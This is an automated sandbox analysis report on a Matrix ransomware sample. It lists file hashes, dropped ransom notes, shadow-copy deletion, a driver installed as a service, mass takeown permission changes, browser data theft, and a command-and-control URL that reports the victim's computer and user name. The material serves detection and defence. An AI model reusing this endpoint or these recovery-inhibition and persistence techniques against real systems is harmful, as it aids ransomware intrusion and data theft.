matrix | 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

Analysis

max time kernel
114s
max time network
119s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
28-12-2022 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Size

1.2MB
MD5

c50c17057fc6ea67bc579196f1f73712
SHA1

44495db58fa7c94db840a3f696c8f546a5fce2d1
SHA256

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA512

7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
SSDEEP

24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Mahjong\ja-JP\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Google\Update\Install\{562AB408-075B-474F-9E4F-73C2E8861B3E}\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Favorites\Links for United States\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\pe9iawd3.default-release\startupCache\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Music\Sample Music\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
HTTP URL	4	http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=VDWSWJJD\|Admin&sid=1VXUZqG20GdTKWDI&phase=[ALL]3DF5B107EB0F557A
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Solitaire\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Searches\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\de-DE\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\it-IT\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1214520366-621468234-4062160515-1000\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\pe9iawd3.default-release\storage\permanent\chrome\idb\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Games\Purble Place\en-US\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Music\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007731\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Libraries\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\SetupMetrics\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exe

pid process

1824 bcdedit.exe
792
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

9 1176 powershell.exe
10 1992 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

XK0Utxzv64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS XK0Utxzv64.exe

pid	process
1824	bcdedit.exe
792

flow	pid	process
9	1176	powershell.exe
10	1992	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	XK0Utxzv64.exe

Executes dropped EXE 64 IoCs

Processes:

NWD6oM0v.exeXK0Utxzv.exeXK0Utxzv64.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exeXK0Utxzv.exe

pid	process
568	NWD6oM0v.exe
1264	XK0Utxzv.exe
268	XK0Utxzv64.exe
340	XK0Utxzv.exe
1792	XK0Utxzv.exe
1540	XK0Utxzv.exe
1616	XK0Utxzv.exe
1956	XK0Utxzv.exe
568	XK0Utxzv.exe
1284	XK0Utxzv.exe
1900	XK0Utxzv.exe
336	XK0Utxzv.exe
936	XK0Utxzv.exe
1484	XK0Utxzv.exe
300	XK0Utxzv.exe
1712	XK0Utxzv.exe
684	XK0Utxzv.exe
664	XK0Utxzv.exe
1152	XK0Utxzv.exe
564	XK0Utxzv.exe
916	XK0Utxzv.exe
1608	XK0Utxzv.exe
664	XK0Utxzv.exe
1412	XK0Utxzv.exe
1604	XK0Utxzv.exe
1628	XK0Utxzv.exe
1608	XK0Utxzv.exe
568	XK0Utxzv.exe
748	XK0Utxzv.exe
1156	XK0Utxzv.exe
1476	XK0Utxzv.exe
596	XK0Utxzv.exe
684	XK0Utxzv.exe
1176	XK0Utxzv.exe
1560	XK0Utxzv.exe
364	XK0Utxzv.exe
340	XK0Utxzv.exe
1628	XK0Utxzv.exe
1616	XK0Utxzv.exe
1560	XK0Utxzv.exe
2004	XK0Utxzv.exe
232	XK0Utxzv.exe
784	XK0Utxzv.exe
1844	XK0Utxzv.exe
1912	XK0Utxzv.exe
1176	XK0Utxzv.exe
884	XK0Utxzv.exe
204	XK0Utxzv.exe
236	XK0Utxzv.exe
1156	XK0Utxzv.exe
1328	XK0Utxzv.exe
1028	XK0Utxzv.exe
1176	XK0Utxzv.exe
792	XK0Utxzv.exe
212	XK0Utxzv.exe
996	XK0Utxzv.exe
1608	XK0Utxzv.exe
1072	XK0Utxzv.exe
616	XK0Utxzv.exe
796	XK0Utxzv.exe
204	XK0Utxzv.exe
1240	XK0Utxzv.exe
1672	XK0Utxzv.exe
1720	XK0Utxzv.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

XK0Utxzv64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	XK0Utxzv64.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1264-103-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/340-113-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1792-118-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1540-126-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1616-131-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1956-143-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/568-147-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1284-156-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1900-161-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/336-170-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/936-175-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1484-184-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/300-190-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1712-198-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/684-202-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/664-206-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1152-210-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/564-214-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/916-218-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/1608-223-0x0000000000400000-0x0000000000477000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe	upx
behavioral1/memory/664-227-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Loads dropped DLL 64 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.execmd.exeXK0Utxzv.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
1404	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
1552	cmd.exe
1264	XK0Utxzv.exe
300	cmd.exe
1604	cmd.exe
2016	cmd.exe
792	cmd.exe
1352	cmd.exe
996	cmd.exe
1720	cmd.exe
1204	cmd.exe
364	cmd.exe
468	cmd.exe
1720	cmd.exe
1072	cmd.exe
2040	cmd.exe
1176	cmd.exe
1900	cmd.exe
828	cmd.exe
336	cmd.exe
1184	cmd.exe
1624	cmd.exe
964	cmd.exe
364	cmd.exe
1152	cmd.exe
1480	cmd.exe
596	cmd.exe
1304	cmd.exe
616	cmd.exe
1152	cmd.exe
996	cmd.exe
1844	cmd.exe
852	cmd.exe
876	cmd.exe
964	cmd.exe
336	cmd.exe
1284	cmd.exe
684	cmd.exe
1680	cmd.exe
2040	cmd.exe
796	cmd.exe
224	cmd.exe
1908	cmd.exe
1328	cmd.exe
364	cmd.exe
748	cmd.exe
1480	cmd.exe
208	cmd.exe
1604	cmd.exe
828	cmd.exe
1204	cmd.exe
1812	cmd.exe
1484	cmd.exe
1476	cmd.exe
568	cmd.exe
916	cmd.exe
232	cmd.exe
1624	cmd.exe
1100	cmd.exe
852	cmd.exe
876	cmd.exe
2004	cmd.exe
324	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
564	takeown.exe
1604	takeown.exe
936
876	takeown.exe
1600
1908	takeown.exe
1176	takeown.exe
596	takeown.exe
1476
556	takeown.exe
1912	takeown.exe
1504
616
784	takeown.exe
220	takeown.exe
300	takeown.exe
1556	takeown.exe
1556
1332	takeown.exe
364	takeown.exe
1028	takeown.exe
996	takeown.exe
1184	takeown.exe
232	takeown.exe
1284	takeown.exe
1392	takeown.exe
884
1176
216	takeown.exe
1176	takeown.exe
204
1900
852
232
1352	takeown.exe
884	takeown.exe
1604
884	takeown.exe
1604
1604
1608
1476	takeown.exe
616	takeown.exe
852	takeown.exe
568
1032
1412
884
1628	takeown.exe
1600	takeown.exe
748
1560
1328	takeown.exe
1956	takeown.exe
616	takeown.exe
204	takeown.exe
1204	takeown.exe
1600	takeown.exe
1556	takeown.exe
1908
1608	takeown.exe
1284	takeown.exe
916
1284

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 41 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZNYHOEOL\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CYEXZCX2\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\9M5JJ10P\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
